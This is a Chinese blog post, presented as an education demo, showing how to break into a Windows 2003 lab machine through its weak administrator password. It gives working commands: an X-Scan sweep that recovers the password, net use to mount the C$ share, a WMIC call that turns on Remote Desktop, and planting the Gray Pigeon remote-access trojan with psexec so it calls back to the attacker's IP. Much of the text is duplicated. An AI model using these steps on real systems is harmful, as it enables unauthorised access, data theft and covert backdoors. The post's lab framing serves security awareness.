加固网络安全是网络管理人员的重要工作,口令满足复杂性是最基本的要求,但很多管理员对弱口令嗤之以鼻,认为没什么大不了?不见棺材不掉泪,一步一步直捣黄龙……
实验环境:vm6.51(windows2003+winxp),如图:
实验环境:vm6.51(windows2003+winxp),如图:
第一招:扫你没商量
工具:x-scan-v3.3,在winxp上打开xcan,设置|扫描参数,输入要扫描的主机:192.168.10.1,确定。
单击开始扫描,xcan将会对192.168.10.1这台主机开始全方位扫描:
扫描完成,xscan将会以网页形势报告扫描信息,将会看到管理员口令:
第二招:你的数据我做主
开始|运行:CMD.出现命令提示符,输入net use \\192.168.10.1\ipc$ qwert /user:administrator
net use x: \\192.168.10.1\c$
打开我的电脑|x:,对方数据一览无余:
第三招:开你远程,你的电脑我用用
测试远程桌面是否开启,连接失败:
开始|运行:cmd,输入代码:Wmic /node:192.168.10.1 /USER:administrator PATH win32_terminalservicesetting WHERE (__Class!="") CALL SetAllowTSConnections 1,输入管理员口令:
再远程桌面连接,开始|远行:mstsc,连接成功:
第四招:种个木马,神不知鬼不觉
打开灰鸽子,点击配置服务程序,ip通知:192.168.10.2,保存路径为c:\,点成生成服务器端:
拷贝工具软件psexec.exe到c:\:
开始运行,输入以下命令,点击agree,如图:
打开灰鸽子程序,发现192.168.10.1已上线:
发个信息警言一下:
看一下结果:
网络安全教育演示用,弱口令真的很危险!!!
工具:x-scan-v3.3,在winxp上打开xcan,设置|扫描参数,输入要扫描的主机:192.168.10.1,确定。
单击开始扫描,xcan将会对192.168.10.1这台主机开始全方位扫描:
扫描完成,xscan将会以网页形势报告扫描信息,将会看到管理员口令:
第二招:你的数据我做主
开始|运行:CMD.出现命令提示符,输入net use \\192.168.10.1\ipc$ qwert /user:administrator
net use x: \\192.168.10.1\c$
打开我的电脑|x:,对方数据一览无余:
第三招:开你远程,你的电脑我用用
测试远程桌面是否开启,连接失败:
开始|运行:cmd,输入代码:Wmic /node:192.168.10.1 /USER:administrator PATH win32_terminalservicesetting WHERE (__Class!="") CALL SetAllowTSConnections 1,输入管理员口令:
再远程桌面连接,开始|远行:mstsc,连接成功:
第四招:种个木马,神不知鬼不觉
打开灰鸽子,点击配置服务程序,ip通知:192.168.10.2,保存路径为c:\,点成生成服务器端:
拷贝工具软件psexec.exe到c:\:
开始运行,输入以下命令,点击agree,如图:
打开灰鸽子程序,发现192.168.10.1已上线:
发个信息警言一下:
看一下结果:
网络安全教育演示用,弱口令真的很危险!!!
本文出自 “IT动手实验营” 博客,请务必保留此出处http://netwj.blog.51cto.com/715492/229240
